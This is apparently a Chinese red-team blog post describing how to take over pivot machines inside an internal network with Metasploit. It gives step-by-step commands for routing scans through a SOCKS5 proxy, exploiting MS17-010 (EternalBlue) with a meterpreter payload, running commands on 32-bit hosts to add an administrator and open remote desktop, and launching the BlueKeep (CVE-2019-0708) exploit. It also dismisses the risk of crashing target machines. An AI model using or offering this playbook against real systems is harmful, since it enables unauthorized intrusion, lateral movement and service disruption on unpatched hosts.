基于 Metasploit 如何快速在内网拿到其他跳板机

渗透攻击红队

一个专注于红队攻击的公众号

大家好，这里是 渗透攻击红队 的第 59 篇文章，本公众号会记录一些红队攻击的案例，不定时更新

针对于使用 MSF 对内网进行扫描，常见的就是使用 proxychains（socks5）
+ msfconsole 就能直接对内网进行扫描， 但其实 proxychains 还是有很多问题的，不太稳定... 为了延缓这一缺点，MSF 有一个参数可以弥补这一缺点：

msf6 > setg Proxies socks5:你的socksIP:端口

MSF 只需要设置这一条参数就可以接入 Socks5 隧道！

之后为了梳理扫描到的漏洞资产或者其他，我们需要把 MSF 连接到数据库：

msf6 > db_connect postgres:hacker@127.0.0.1/msfdbConnected to Postgres data service: 127.0.0.1/msfdb

设置好之后，以后通过 MSF 扫描到的资产或者漏洞都可以保存到数据库，方便我们梳理，我常用的就是这两个语句：

msf6 > services      查看扫描到的资产IP及端口

msf6 > vulns      查看扫描到的漏洞资产

在内网渗透过程中如果想要快速拿到一台跳板机器，首选 MS17-010 来打，当然还需要针对与不同的操作系统位数来选择不同的利用模块打；如果目标操作系统是 Win7x64、2008x64 的，可以直接使用正向代理 exploit 利用模块打过去：

msf6> use exploit/windows/smb/ms17_010_eternalbluemsf6> set payload windows/x64/meterpreter/bind_tcpmsf6> run

要是目标系统是 2003x32、Win7x32 的只能使用这个模块去执行命令：

msf6> use auxiliary/admin/smb/ms17_010_commandmsf6> set command whoamimsf6> run

思路就是添加一个超级管理员权限的用户，开启它远程桌面服务：

除了永恒之蓝还有 0708 可以快速获取到目标主机权限（前提目标开启了 3389，未打补丁），实际情况下很多单位都只打了永恒之蓝的补丁，对于 0708 的补丁还没打，所以很多情况下还是可以利用的！针对于0708 可以使用这个模块打：

msf6> use exploit/windows/rdp/cve_2019_0708_bluekeep_rcemsf6> run

以上关于 MS17-010、CVE-2019-0708 这两个漏洞虽然能够快速获取到内网主机权限，相对于其他漏洞来说还是动静太大，永恒之蓝还好，0708 一般来说要打很多次，其中目标主机还会关机蓝屏，所以如果 xdm 不考虑后果的情况下是可以使用这两个漏洞快速去横向渗透，如果害怕动静大的话，这两个漏洞只能是缓兵之计，没有办法了再去用！

渗透攻击红队

一个专注于渗透红队攻击的公众号

点分享

点点赞

点在看